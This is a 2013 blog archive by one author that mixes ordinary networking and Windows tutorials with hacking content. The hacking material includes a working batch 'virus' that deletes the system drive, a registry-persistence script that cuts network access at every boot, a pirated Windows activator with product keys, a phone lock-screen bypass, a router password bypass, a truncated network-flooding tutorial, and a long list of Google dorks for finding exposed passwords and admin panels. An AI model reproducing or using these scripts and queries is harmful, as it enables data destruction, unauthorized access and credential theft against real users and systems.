Sunday, December 1, 2013

WINDOWS ACTIVATE WINDOWS GENUINE GORVAM SADDAR

How To Make Window Genuiene

Windows 8 Activator

First download the Windows 8 Pro activator from above download button.
NOTE: Download all files to your computer. You can download all files in a single ZIP file by clicking on File->Download
Open folder step 1


  • Run Windows 8 Pro Final Activator as administrator
  • Wait for the process to complete and let your PC restarts automatically (If not then restart it manually)
  • Voila! your Windows is "activated"
  • Now open folder step 2
  • Run WPE.exe
Download Activator

Windows 8 Professional
NG4HW-VH26C-733KW-K6F98-J8CK4
XKY4K-2NRWR-8F6P2-448RF-CRYQH

Windows 8 Professional N
XCVCF-2NXM9-723PB-MHCB7-2RYQQ

RUN COMMANDS GORVAM SADDAR

RUN Commands


Run Commands

-----------------------------------------------------------

START >> RUN

Accessibility Controls
access.cpl

Add Hardware Wizard
hdwwiz.cpl

Add/Remove Programs
appwiz.cpl

Administrative Tools
control.exe admintools

Automatic Updates
wuaucpl.cpl

Bluetooth Transfer Wizard
fsquirt

Calculator
calc

Certificate Manager
certmgr.msc

Character Map
charmap

Check Disk Utility
chkdsk

Clipboard Viewer
clipbrd

Command Prompt
cmd

Component Services
dcomcnfg

Computer Management
compmgmt.msc

Date and Time Properties
timedate.cpl

DDE Shares
ddeshare

Device Manager
devmgmt.msc

Direct X Control Panel (if installed)
directx.cpl

Direct X Troubleshooter
dxdiag.......

 

much more .................

SEO SEARCH ENGINE OPTIMZATION GORVAM SADDAR

Search engine optimization or SEO is the hottest way to drive targeted traffic to your website. Maximizing the benefits of a well optimized website will yield lots of earnings for the marketer. However, optimizing your site might cost you thousands of dollars if you are not skilled in this area.

But to tell you the truth, you can essentially get information on low cost SEO anywhere in the Internet. But only several really show you how to work out an affordable search engine optimization endeavor. And those few that really inform include this article.

Keyword Research Tools
-------------------------------
You must do keyword research before you start optimizing your site, that much is obvious, but what tools should you use?
There are two excellent keyword research tools that I can recommend as professional tools. They are Wordtracker and Keyword Discovery. Both are great and both are different. Firstly start with with Wordtracker and then move over to Keyword Discovery

BYPASS CODE PHONE SCREEN LOCK GORVAM SADDAR

How To Bypass Smartphone Lock Screen




Bypass lock screen of iPhone and Samsung Smartphones bypass vulnerabilities. Which has founded by security researchers.


Bypass iOS7 Lock Screen




Samsung Galaxy Note2 and S3


Samsung Galaxy Note2

Security specialist Terence Eden explained in his blog that unauthorized users can press the “emergency call” and the “in case of an emergency” (ICE) contact list buttons and hold down the home button at the same time to cause the device’s home screen to pop up. From there a user can touch an app and gain access to it.

Steps:

  1.     Lock the device with a "secure" pattern, PIN, or password.
  2.     Activate the screen.
  3.     Press "Emergency Call".
  4.     Press the "ICE" button on the bottom left.
  5.     Hold down the physical home key for a few seconds and then release.
  6.     The phone's home screen will be displayed - briefly.
  7.     While the home screen is displayed, click on an app or a widget.
  8.     The app or widget will launch.
  9.     If the widget is "direct dial" the phone will start ringing.

LEARN TCP/IP IP ADDRESSING PROTOCOLS BY GORVAM SADDAR

Learn TCP/IP



The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.

For Check Your IP Address..

for see another IP address

Why it works ?
IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is security weakness in the TCP protocol known as sequence number prediction.

How it works ?
To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.

Photobucket


WEBSITE HACKING BY GORVAM SADDAR


Do U Think If Your Email Can Not Been Hackable, Then You Are Wrong...
Ur Email-ID Can Be Hack... But Its Can Be Hack Only Fault by User.. Most Of The Peoples Think That Their Has A Software to Hack A Email- ID's But Truth Is Their Is No Software Present For Hacking Ur Mail ID's..

Email Hacking can be possible to many ways like:-

FIREFOX ADDONS BY GORVAM SADDAR

FOX TAB:
3D in your browser! FoxTab brings innovative 3D functionality to your Firefox.



New! Top Sites for FoxTab (aka Speed Dial).
Now you can access your most favorite sites from the familiar FoxTab interface.

FoxTab is a popular 3D tab management extension.
FoxTab powers Firefox with the following main features:
  ✔ Top Sites (aka Speed Dial) for quickly accessing your favorite web sites.
  ✔ Tab Flipper – to easily flip between opened tabs using mouse or keyboard gestures.
  ✔ Recently Closed Tabs – for reopening a tab that was recently closed.

Choose between 6 attractive 3D layouts.

Download Link:
https://addons.mozilla.org/en-US/firefox/addon/8879/

Saturday, November 30, 2013

block website by gorvam saddar



>>>Steps

1] Browse C:\WINDOWS\system32\drivers\etc

2] Find the file named "HOSTS"

3] Open it in notepad

4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessable.

5] Done!


example :

127.0.0.1 localhost

127.0.0.2 www.orkut.com


www.orkut.com is now unaccessable

write virus, create virus, develop virus script by gorvam saddar

IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .

 All Scripts Here Are To Be Copied In Note Pad


>>This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code a .bat file



>>Disable Internet Permanently
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Thursday, November 28, 2013

sample exam papers networking mcitp cisco exam interview questions with answers by gorvam saddar

Technical Interview Questions (Part 1/3)
[Networking]


Edited & Maintained by SYED JAHANZAIB / aacable@hotmail.com

1.    What is an IP address? 

2.    What is a subnet mask? 

3.    What is ARP? 

4.    What is ARP Cache Poisoning? 

5.    What is the ANDing process? 

6.    What is a default gateway? What happens if I don’t have one? 

7.   Can a workstation computer be configured to browse the Internet and
yet NOT have a default gateway? 


8.    What is a subnet? 

9.    What is APIPA? 

10.   What is an RFC? Name a few if possible (not  necessarily
the numbers, just the ideas behind them) 

11.   What is RFC 1918? 
 many more answers tooo......

Thursday, November 14, 2013

NETWORK FLOODING ON IPV6 networtk jamming flood a network block network BY GORVAM SADDAR

EDUCATIONAL PURPOSES ONLY

Hello Hackforums, I would like to release this simple tutorial onto how to crash a PC based network. This exploit will work on 90% of networks. If the network of Windows computers connected are vulnerable they will consume 100% CPU usage and then become unresponsive. Now how to check if a network is vulnerable.

Press Windows Key + R on your keyboard and type "cmd" then press enter. Once inside command prompt type the following command.
Code:
ipconfig
Then look at your results. If your results including something along the lines of "IPv6 Address" the network is vulnerable. 90% of network are currently vulnerable to this.

How to take out the network
1> Boot into Backtrack 5 R3 and connect to the network
2> Run this command
Code:

Tuesday, November 5, 2013

Registry tutorial windows registry, change registery, registry editor regedit by gorvam saddar

Windows Registry Tutorial


Overview
The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.
The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).
The Structure of the Registry
The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer.


Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context.
There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:

ALL ABOUT HACKERS AND HACKING WORD MEANS, HACK GLOSSARY by Gorvam saddar

We live in an era of unprecedented cyberattacks, where malicious campaigns, both personal and governmental, are carried out across laptops and wireless networks.
Even if you are not technically minded, your day-to-day life is still probably pretty crowded with stories about hacking, whether you recognize them as such or not.
Have you ever installed an antivirus tool on your computer? Read a story about WikiLeaks or the Arab Spring? Opened a bank account? Then hacking is important to you, even if remains largely in the background of your life. It makes sense to get informed about it. Unfortunately, it is a very technical subject, with a great deal of specialized vocabulary.

FRAME RELAY wan technology cisco ccna fully EXPLAINED with configuration by gorvam saddar

This paper will address the following issues:
  1. What is Frame Relay?
  2. How does Frame Relay differ from other techniques?
  3. What is Frame Relay useful for?
  4. How does frame relay fit in the U.S. Internet strategy?
  5. Mixing Frame Relay with other technologies
  6. Pros and Cons of Frame Relay
  7. Technical aspects of installing and running frame
Items one through six will address general overviews of frame; item 7 will be a technical discussion related to equipment installation and setup that is probably only interesting for the technical staff involved in this area.
1. What is Frame Relay?
Frame relay is a technique used to transport data from locations to location, just like T-1 lines or ISDN connections do. In frame relay, there are a number of locations on the network that can send and receive data. These connections are known as Ports. Each location that needs access to the frame system, needs to have one of these ports.

ROUTER PASSWORD BREAKING BYPASS ROUTER PASSWORD PROCESS STEP BY STEP GORVAM SADDAR


  • Turn the power switch off and back on to recycle the power. 
  • Press the Break key or key sequence to put the router into ROM Monitor mode. The break key varies by computer or terminal software. The sequence might be CTRL-D, CTRL-Breakor another combination. 
  • At the  > prompt, type 0 to record the current value of the configuration register normally 0x2102, or 0x102.
  • >o
    Configuration register = 0x2102 at last boot
    Bit#    Configuration register option settings:
    15      Diagnostic mode disabled. 
  • Type o/r 0x2142 to tell the router to boot from flash without loading the configuration in NVRAM at the next reload. 
  • Type i to have the router reboot. The router ignores the configuration in NVRAM.
  • The router runs the setup dialog, Type no or press Ctrl-C to skip the initial setup Dialog
  • Type enable ate the Router> prompt to go to privileged exec mode.
  • Copy the startup configuration to the running configuration by using the configure memory or copy startup-config running-config commands. Do not type configure terminal. If you use the configure terminal command, you overwrite the configuration stored in NVRAM.
  • View the configuration by typing write terminal or show running-config. View the configured line, vty and enable passwords. Any encrypted passwords need to be changed. 

ALL WINDOWS CMD COMMANDS, DOS COMMANDS, COMMAND PROMPT COMMNADS

ASSOC Displays or modifies file extension associations.
ATTRIB Displays or changes file attributes.
BREAK Sets or clears extended CTRL+C checking.
*BCDEDIT Sets properties in boot database to control boot loading.
CACLS Displays or modifies access control lists (ACLs) of files.
CALL Calls one batch program from another.
CD Displays the name of or changes the current directory.
CHCP Displays or sets the active code page number.
CHDIR Displays the name of or changes the current directory.
CHKDSK Checks a disk and displays a status report.
CHKNTFS Displays or modifies the checking of disk at boot time.
*CHOICE Batch file command that allows users to select from a set of options.
CIPHER Displays or alters the encryption of directories [files] on NTFS partitions.
*CLIP Redirects output of another command to the Windows clipboard.
CLS Clears the screen.
CMD Starts a new instance of the Windows command interpreter.
*CMDKEY Creates, lists and deletes stored user names and passwords or credentials.
COLOR Sets the default console foreground and background colors.
COMP Compares the contents of two files or sets of files.
COMPACT Displays or alters the compression of files on NTFS partitions.
CONVERT Converts FAT volumes to NTFS. You cannot convert the current drive.
COPY Copies one or more files to another location.
DATE Displays or sets the date.
DEFRAG Disk defragmenter accessory.

DNS SERVER ,FULL EXPLAINED STEP BY STEP GORVAM SADDAR


Understanding the DNS namespace


The following illustration shows how the DNS namespace is organized.

A DNS name consists of two or more parts separated by periods, or "dots" (.). The last (rightmost) part of the name is called the top-level domain (TLD). Other parts of the name are subdomains of the TLD or another subdomain. The names of the TLDs are either functional or geographical. Subdomains usually refer to the organization that owns the domain name.
Functional TLDs suggest the purpose of the organization that has registered a subdomain in the TLD. The following table shows some of the most common functional TLD names.

Functional TLD
Typically used by …
.com
Commercial entities, such as corporations, to register DNS domain names
.edu
Educational institutions, such as colleges, and public and private schools
.gov
Government entities, such as federal, state, and local governments
.net
Organizations that provide Internet services, such as Internet service providers (ISPs)
.org
Private, nonprofit organizations

Creating an Internet DNS domain name

An Internet DNS domain name has a TLD name, such as .com, .org, or .edu, and a unique subdomain name that the domain owner chooses. For example, a company named Contoso Corporation would probably choose contoso.com as its Internet domain name.

Monday, November 4, 2013

STEP BY STEP CONFIGURATION OF (RRAS) REMOTE ACCEES SERVER AND ROUTING WINDOWS SERVER 2008

Routing and Remote Access Service
Updated: September 30, 2009
Applies To: Windows 7, Windows Server 2008, Windows Server 2008 R2, Windows Vista
The Routing and Remote Access service (RRAS) in Windows Server® 2008 R2 and Windows Server® 2008 supports remote user or site-to-site connectivity by using virtual private network (VPN) or dial-up connections. RRAS consists of the following components:
  • Remote Access. By using RRAS, you can deploy VPN connections to provide end users with remote access to your organization's network. You can also create a site-to-site VPN connection between two servers at different locations.
  • Routing. RRAS is a software router and an open platform for routing and networking. It offers routing services to businesses in local area network (LAN) and wide area network (WAN) environments or over the Internet by using secure VPN connections. Routing is used for multiprotocol LAN-to-LAN, LAN-to-WAN, VPN, and network address translation (NAT) routing services.
Getting Started
  • Windows Server 2008 R2 and Windows Server 2008 each include new features designed to enhance security and manageability of RRAS. This topic describes the new features and other significant changes made to RRAS, including the addition of new VPN tunneling protocols, VPN enforcement for Network Access Protection, and Internet Protocol version 6 (IPv6) support. For more information, see What's New in Routing and Remote Access in Windows Server 2008.

NETWORKING TOPOLOGIES . GORVAM SADDAR

LAN Topologies

In the late 1960s and the early 1970s researchers developed a form of computer communication known as Local Area Networks (LANs). These are different from long-distance communications because they rely on sharing the network. Each LAN consists of a single shared medium, usually a cable, to which many computers are attached. The computers co-ordinate and take turns using the medium to send packets.
Unfortunately, this mechanism does not scale. Co-ordination requires communication, and the time to communicate depends on distance - large geographic separation between computers introduces longer delays. Therefore, shared networks with long delays are inefficient. In addition, providing high bandwidth communication channels over long distances is very expensive.
There are a number of different LAN technologies. Each technology is classified into a category according to its topology, or general shape. The first of these is a star topology, as illustrated in Figure 3.

Figure 3: Star topology
The hub accepts data from a sender and delivers it to the receiver. In practice, a star network seldom has a symmetric shape; the hub often resides in a separate location from the computers attached to it.
A network using a ring topology arranges the computers in a circle - the first computer is cabled to the second. Another cable connects the second computer to the third, and so on, until a cable connects the final computer back to the first. This is illustrated in Figure 4.

Friday, November 1, 2013

Browser specific comparison. KNOW YOUR BROWSER BROSER SECURITY BROWSER PLUGINS BY GORVAM SADDAR

this is the best link of all the major browsers all the listed features and from those i think firefox is the best.


 MAMIMIZE PICTURE TO VIEW THE CONTENTS.

hcon browser, used for hacking tasks, tamper data, Gorvam Saddar

Features
  • Categorized and comprehensive toolset
  • Contains hundreds of tools and features and script for different tasks like SQLi, XSS,Dorks, OSINT to name a few
  • HconSTF webUI with online tools (same as the Aqua base version of HconSTF)
  • Each and every option is configured for penetration testing and Vulnerability assessments
  • Specially configured and enhanced for gaining easy & solid anonymity
  • Works for web app testing assessments specially for owasp top 10
  • Easy to use & collaborative Operating System like interface
  • Multi-Language support (feature in heavy development translators needed)

Wednesday, October 9, 2013

ENCRYPTION ALGORHTYMS DECRYPTION ENCRYPTION TECHNIQUES METHODS, STANDARDS GORVAM SADDAR



Encryption standards[edit]
·         Data Encryption Standard (DES, now obsolete)
·         Triple-DES
·         Advanced Encryption Standard (AES)
·         RSA the original public key algorithm
·         OpenPGP
·         CipherSaber
Hash standards[edit]
·         MD5 128-bit (obsolescent)
·         SHA-1 160-bit
·         SHA-2 available in 224, 256, 384 and 512-bit variants
·         HMAC keyed hash
·         PBKDF2 Key derivation function (RFC 2898)
Digital signature standards[edit]
·         Digital Signature Standard (DSS), based on the Digital Signature Algorithm (DSA)
·         RSA
Public-key infrastructure (PKI) standards[edit]
·         X.509 Public Key Certificates
Wireless Standards[edit]
·         Wired Equivalent Privacy (WEP), severely flawed and superseded by WPA
·         Wi-Fi Protected Access (WPA) better than WEP, a 'pre-standard' partial version of 802.11i
·         802.11i a.k.a. WPA2, uses AES and other improvements on WEP
·         A5/1 and A5/2 cell phone encryption for GSM

List Of Hack toolshacking cyber security redhat linux/unix/backtrack/kali network security tools gorvam saddar



Wireshark (known as Ethereal until a trademark dispute in summer 2006) is a fantastic open source multi-platform network protocol analyzer. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need.

Metasploit

Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research.

Nessus 

Nessus is one of the most popular and capable vulnerability scanners, particularly for UNIX systems. It was initially free and open source...

Tuesday, October 1, 2013

SECRET DORKS google dorks all dorks list gorvam saddar

::G00gle S3r3t D0^rK$$::..
Posted by Satyamevjayte Haxor on 14:17
0
    ..::G00gle S3r3t D0^rK$$::..
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendars?ri?t/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform" inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
CuteNews" "2003..2005 CutePHP"
DWMail" password intitle:dwmail
Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com
Midmart Messageboard" "Administrator Login"
Monster Top List" MTL numrange:200-
UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail development Team"
"SysCP - login"
"This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions" -.edu
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"



inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker

inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm

inurl:union 4.1.22-standard-log
inurl:union 5.0.67-log
inurl:union» 4.1.22-log
inurl:union 5.0.32
inurl:union» 5.0.67
inurl:union» 5.0.51a-3ubuntu5
inurl:union» 5.1.63-cll
inurl:bootstrap.php
inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker
inurl:group_concat username 0x3a PASSWORD from users
